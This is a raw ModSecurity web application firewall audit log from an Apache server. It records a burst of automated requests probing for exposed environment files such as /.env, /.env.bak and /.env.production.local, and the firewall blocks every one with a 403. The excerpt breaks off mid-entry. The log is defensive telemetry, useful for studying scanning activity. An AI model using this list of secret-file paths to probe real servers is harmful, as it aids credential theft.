Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747799996293465 3181 (- - -) Stopwatch2: 1747799996293465 3181; combined=1299, p1=446, p2=823, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f11f942-Z-- --de55c41e-A-- [21/May/2025:11:01:08 +0700] aC1QBHZGSt58M5vv3glyoAAAABQ 103.236.140.4 41312 103.236.140.4 8181 --de55c41e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/604.1 (KHTML, like Gecko) Version/11.0 Safari/604.1 Ubuntu/17.04 (3.24.1-0ubuntu1) Epiphany/3.24.1 Accept-Charset: utf-8 --de55c41e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de55c41e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800068162671 691 (- - -) Stopwatch2: 1747800068162671 691; combined=306, p1=279, p2=0, p3=0, p4=0, p5=27, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de55c41e-Z-- --eacc742b-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnygAAAJc 103.236.140.4 41320 103.236.140.4 8181 --eacc742b-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --eacc742b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eacc742b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197363993 864 (- - -) Stopwatch2: 1747800197363993 864; combined=373, p1=337, p2=0, p3=0, p4=0, p5=36, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eacc742b-Z-- --7609b215-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnywAAAIM 103.236.140.4 41324 103.236.140.4 8181 --7609b215-B-- GET /.env.live HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --7609b215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7609b215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557313 807 (- - -) Stopwatch2: 1747800197557313 807; combined=342, p1=314, p2=0, p3=0, p4=0, p5=28, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7609b215-Z-- --60f8495f-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnzAAAAIE 103.236.140.4 41334 103.236.140.4 8181 --60f8495f-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --60f8495f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60f8495f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557509 755 (- - -) Stopwatch2: 1747800197557509 755; combined=289, p1=262, p2=0, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60f8495f-Z-- --de7ad441-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyogAAABc 103.236.140.4 41330 103.236.140.4 8181 --de7ad441-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --de7ad441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de7ad441-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557547 836 (- - -) Stopwatch2: 1747800197557547 836; combined=357, p1=318, p2=0, p3=0, p4=0, p5=38, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de7ad441-Z-- --ee0aec37-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHMwAAANQ 103.236.140.4 41322 103.236.140.4 8181 --ee0aec37-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --ee0aec37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee0aec37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557528 1031 (- - -) Stopwatch2: 1747800197557528 1031; combined=363, p1=326, p2=0, p3=0, p4=0, p5=36, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee0aec37-Z-- --bec82e6d-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyowAAAAA 103.236.140.4 41342 103.236.140.4 8181 --bec82e6d-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --bec82e6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bec82e6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557812 849 (- - -) Stopwatch2: 1747800197557812 849; combined=310, p1=279, p2=0, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bec82e6d-Z-- --09657f57-A-- [21/May/2025:11:03:17 +0700] aC1QhSioYDAgD0WHUjSnawAAAE0 103.236.140.4 41340 103.236.140.4 8181 --09657f57-B-- GET /.env.103.236 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --09657f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09657f57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557853 917 (- - -) Stopwatch2: 1747800197557853 917; combined=348, p1=307, p2=0, p3=0, p4=0, p5=41, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09657f57-Z-- --e279065f-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNAAAANU 103.236.140.4 41348 103.236.140.4 8181 --e279065f-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --e279065f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e279065f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557826 1061 (- - -) Stopwatch2: 1747800197557826 1061; combined=304, p1=264, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e279065f-Z-- --1f86f702-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypQAAABg 103.236.140.4 41336 103.236.140.4 8181 --1f86f702-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --1f86f702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f86f702-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557843 1189 (- - -) Stopwatch2: 1747800197557843 1189; combined=214, p1=193, p2=0, p3=0, p4=0, p5=21, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f86f702-Z-- --8d048037-A-- [21/May/2025:11:03:17 +0700] aC1QhYv3pT1iV0OxjLTnzQAAAJg 103.236.140.4 41332 103.236.140.4 8181 --8d048037-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --8d048037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d048037-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557508 1661 (- - -) Stopwatch2: 1747800197557508 1661; combined=296, p1=267, p2=0, p3=0, p4=0, p5=29, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d048037-Z-- --39a84021-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNQAAANY 103.236.140.4 41346 103.236.140.4 8181 --39a84021-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --39a84021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a84021-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557867 1477 (- - -) Stopwatch2: 1747800197557867 1477; combined=369, p1=334, p2=0, p3=0, p4=0, p5=35, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a84021-Z-- --5987e731-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypAAAAAQ 103.236.140.4 41328 103.236.140.4 8181 --5987e731-B-- GET /.env.www HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --5987e731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5987e731-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558014 1467 (- - -) Stopwatch2: 1747800197558014 1467; combined=308, p1=273, p2=0, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5987e731-Z-- --e834615f-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNwAAAME 103.236.140.4 41354 103.236.140.4 8181 --e834615f-B-- GET /.env.140 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --e834615f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e834615f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558290 1310 (- - -) Stopwatch2: 1747800197558290 1310; combined=282, p1=252, p2=0, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e834615f-Z-- --8e69c43c-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypgAAAAc 103.236.140.4 41362 103.236.140.4 8181 --8e69c43c-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --8e69c43c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e69c43c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558442 1317 (- - -) Stopwatch2: 1747800197558442 1317; combined=386, p1=349, p2=0, p3=0, p4=0, p5=37, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e69c43c-Z-- --728a3d43-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNgAAANc 103.236.140.4 41338 103.236.140.4 8181 --728a3d43-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --728a3d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --728a3d43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558044 1855 (- - -) Stopwatch2: 1747800197558044 1855; combined=396, p1=353, p2=0, p3=0, p4=0, p5=42, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --728a3d43-Z-- --c9bd1a45-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqAAAAAU 103.236.140.4 41356 103.236.140.4 8181 --c9bd1a45-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --c9bd1a45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9bd1a45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558285 1769 (- - -) Stopwatch2: 1747800197558285 1769; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9bd1a45-Z-- --c180e941-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHOQAAAMM 103.236.140.4 41350 103.236.140.4 8181 --c180e941-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --c180e941-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c180e941-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558181 2003 (- - -) Stopwatch2: 1747800197558181 2003; combined=306, p1=274, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c180e941-Z-- --2d20e45e-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypwAAAAI 103.236.140.4 41360 103.236.140.4 8181 --2d20e45e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --2d20e45e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d20e45e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558355 1962 (- - -) Stopwatch2: 1747800197558355 1962; combined=342, p1=301, p2=0, p3=0, p4=0, p5=41, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d20e45e-Z-- --174f9f1e-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHOAAAANg 103.236.140.4 41344 103.236.140.4 8181 --174f9f1e-B-- GET 